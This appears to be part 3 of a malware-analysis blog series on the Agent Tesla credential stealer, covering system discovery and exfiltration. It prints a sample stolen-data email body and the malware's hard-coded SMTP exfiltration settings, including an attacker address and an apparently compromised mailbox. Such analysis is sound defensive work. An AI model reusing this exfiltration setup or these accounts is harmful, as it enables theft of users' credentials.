Unfolding Agent Tesla: The Art of Credentials Harvesting. Discovery & Exfiltration
Analysis of Agent Tesla, A Close Look at Password Theft Technique
— Part — 3— Discovery & Exfiltration
System Discovery
Agent Tesla adds all the enumerators to the list and get it ready for exfiltration.
It fetches these details from system using “vVwoRiXJKOu” and from rsrz(“PW”) it fetches “PW_Username_Desktopname” and then merge the passwords with this information.
- Time
- User Name
- Computer Name
- OSFullName
- CPU
- RAM
“Time: 01/03/2024 05:41:35<br>User Name: %username%<br>Computer Name: DESKTOP-002IHON<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: 12th Gen Intel(R) Core(TM) i7–12700KF<br>RAM: 8191.05 MB<br> <hr>Host: https://host.com/<br>Username: username<br>Password: pass<br>Application: Chrome<br><hr>Host: https://test.com/<br>Username: usernameoftest<br>Password: hyhello<br>Application: Chrome<br><hr>Host: https://outlook.com/<br>Username: user<br>Password: pass<br>Application: Edge Chromium<br><hr>Host: https://host.com/<br>Username: username<br>Password: pass<br>Application: Edge Chromium<br><hr>Host: https://test.com/<br>Username: usernameoftest<br>Password: hyhello<br>Application: Edge Chromium<br><hr>”
Exfiltration
Then it prepare mail object for sending the data to attacker’s email, it have saved the attacker’s email hard coded in it which is {debramarett30@gmail.com}
Then it set the sending email address picked from hard coded variable.
Then it sets the subject to the system identifier. Which is PW_username/desktopname.
Then it sets the html body with the data which has system information and system passwords.
Then it initializes smtpclient and configures the options of client and then send the email to attacker’s email.
smtpClient.Host: “mail.elec-qatar.com”
smtpClient.Credentials.Domain : ‘’”
smtpClient.Credentials.Password : *************
smtpClient.Credentials.UserName : mohammed.abrar@elec-qatar.com
smtpClient.Port : 0x0000024B which is 587
smtpClient.UseDefaultCredentials : false;
smtpClient.EnableSsl = false
smtpClient.Server : mail.elec-qatar.com
After Sending the email it disposes the attachment for memory. To clear the system loot.
Parts
Part — 1 — Dropper Analysis
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-f1a988cfd137
Part — 2 — Browsers Stealing
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-2d565c68db0d
Part — 3- Discovery & Exfiltration
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-7a77f69435ee
Part — 4 — Stealing FileZilla
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-d30da9c36988
Part — 5 — Stealing The BAT! EMAIL CLIENT
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-c3fe4854775b
Part — 6 — Stealing Outlook Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-de3737f9d66e
Part — 7 — Stealing Trillian Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-afa2dd6e9de7
Part — 8 — Stealing MailBird Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-e5501af1c942
Part — 9 — Stealing WinSCP Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-55e7b2c64d60
Part — 10 — Stealing Core FTP LE Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-cdce40f6a747
Part — 11 — Stealing WinSCP Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-db9bb6698041
Part — 12 — Stealing FTP Navigator Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-59818a3686a3
Part — 13 — Stealing FTP Commander Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-7d01a41d554b
Part — 14 — Stealing FTP Getter Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-fe5ff29cc93c
